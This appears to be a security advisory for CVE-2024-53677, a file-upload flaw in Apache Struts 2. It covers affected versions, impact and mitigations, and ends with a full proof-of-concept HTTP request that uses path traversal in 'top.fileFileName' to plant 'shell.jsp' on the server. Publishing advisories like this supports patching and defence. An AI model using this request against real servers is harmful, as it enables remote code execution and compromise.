Vulnerable Version
2.0.0 to 2.3.37 (End-of-life)
2.5.0 to 2.5.33
6.0.0 to 6.3.0.2
Fixed Version
Struts 6.5.0 or greater
Base Score
9.5 Critical
Vendor Description:-
Apache Struts 2 is a presentation framework used to create Java web applications with a Model, View, Controller (MVC) architecture. Web applications built with Apache Struts 2 were first launched in 2006 and are still in use today, with the Apache Software Foundation continuing to develop the project. However, many Java web app developers prefer Spring Framework to Struts for new projects.
Vulnerability Description:-
This vulnerability is caused by an issue in the file upload mechanism “FileUploadInterceptor”, which is a component in the default stack that stores the file during the data file transfer operation. Attackers can exploit the weak file-upload mechanism by uploading malicious files to the FileUploadInterceptor component in order to get access to it. Applications that do not have the FileUploadInterceptor component are unaffected. The Apache Struts contribution for version 6.4.0 includes several enhancements, including the introduction of the ActionFileUpload interceptor, a new file upload mechanism. If the action is carried out, this interceptor will generate a number of field errors. This new file upload mechanism fixes the CVE-2024-53677.
Impact
- Remote Code Execution (RCE): An attacker can run arbitrary commands on the server, potentially obtaining complete control of the compromised machine.
- Data Breach: Unauthorized access to sensitive information held on a server.
- System Integrity Risks include virus installation, unauthorized changes to system configurations, and the exploitation of a compromised server to launch attacks on other systems.
Mitigations
Implementing the recommended fix of updating existing applications that use FileUploadInterceptor to instead use ActionFileUploadInterceptor requires developers to modify and test code before releasing a patched version of their application.
Apache notes that this change is not backward compatible, and continuing to use the old mechanism keeps systems vulnerable, regardless if they are using the newer version of Struts. In Struts 7.0.0 (released December 20, 2024), the FileUploadInterceptor has been removed.
POC:-
POST /index.action HTTP/1.1
Host: <target ip>
Accept-Encoding: gzip, deflate, br
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: <your browsing user agent>
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Length: 335
------WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: text/plain
<% out.println("hello world"); %>
------WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Disposition: form-data; name="top.fileFileName"
../shell.jsp
------WebKitFormBoundaryl6ZFZPznNSPZOFJF--
Now you can see shell.jsp
